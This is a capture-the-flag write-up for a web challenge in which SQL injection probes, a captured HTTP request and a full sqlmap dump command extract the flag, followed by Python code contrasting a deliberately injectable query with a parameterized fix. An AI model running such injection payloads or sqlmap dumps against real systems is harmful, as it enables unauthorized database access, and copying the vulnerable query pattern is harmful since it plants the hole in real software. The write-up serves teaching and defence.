Are you rich? Buy the flag!
Solution:
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages not related to the challenge have been removed.
1. The website has two functions: Get our bitcoin address and Verify payment.
2. Try Get our bitcoin address: it generates a Bitcoin address, then go to verify it.
3. Not enough money. I guess that after getting our bitcoin address it inserts this address into a database, and Verify payment checks it. I try SQL injection in the address field.
4. ' or 1=1# --- Found more than 1 records?
5. ' or 1=2# --- does not have enough confirmed money?
6. This confirms that the address parameter is vulnerable to SQL injection. I use Burp Suite to capture the HTTP request and copy it to a text file.
POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8

address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=
7. Use the sqlmap -r option to load the HTTP request from the text file. sqlmap verifies the vulnerability as time-based blind SQL injection; the final sqlmap command used to get the flag:
python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump
8. Wait several minutes to retrieve the flag.
In Burp Suite (Union Based)
Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}
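The two different responses in steps 4 and 5 are what turn the injectable address parameter into a yes/no oracle, and the root cause is the address being concatenated into the query. As an added illustration (not the challenge's code; the table schema, the flag price and the paid address are constructed assumptions), here is that string-built query beside the parameterized fix, on an in-memory sqlite3 table, where the line-comment marker is `-- ` instead of MySQL's `#`:

```python
import sqlite3

PRICE = 10_000_000  # assumed flag price in satoshi (constructed)


def make_db():
    """Constructed stand-in for the challenge's payments table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE payments (address TEXT, confirmed INTEGER)")
    db.executemany("INSERT INTO payments VALUES (?, ?)", [
        ("1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c", 0),       # address from the write-up, unpaid
        ("1ExamplePaidAddressXXXXXXXXXXXXXXX", PRICE),   # constructed, fully paid
        ("1ExampleUnpaidAddressXXXXXXXXXXXXX", 5),       # constructed, partially paid
    ])
    return db


def decide(rows):
    """Same three outcomes the challenge's verify page showed."""
    if len(rows) > 1:
        return "Found more than 1 records"
    if not rows or rows[0][0] < PRICE:
        return "does not have enough confirmed money"
    return "paid"


def vulnerable_verify(db, address):
    # The address is pasted into the SQL text, so ' or 1=1-- rewrites the
    # WHERE clause and matches every row; ' or 1=2-- matches none. The two
    # distinct messages then leak one bit per request (a boolean oracle).
    sql = "SELECT confirmed FROM payments WHERE address = '%s'" % address
    return decide(db.execute(sql).fetchall())


def safe_verify(db, address):
    # Parameter binding: the input is compared only as a string value, so the
    # same payloads simply fail to match any address.
    rows = db.execute(
        "SELECT confirmed FROM payments WHERE address = ?", (address,)
    ).fetchall()
    return decide(rows)
```

Returning one generic failure message for both "no row" and "not enough confirmed" would additionally remove the boolean oracle, though only parameter binding removes the injection itself.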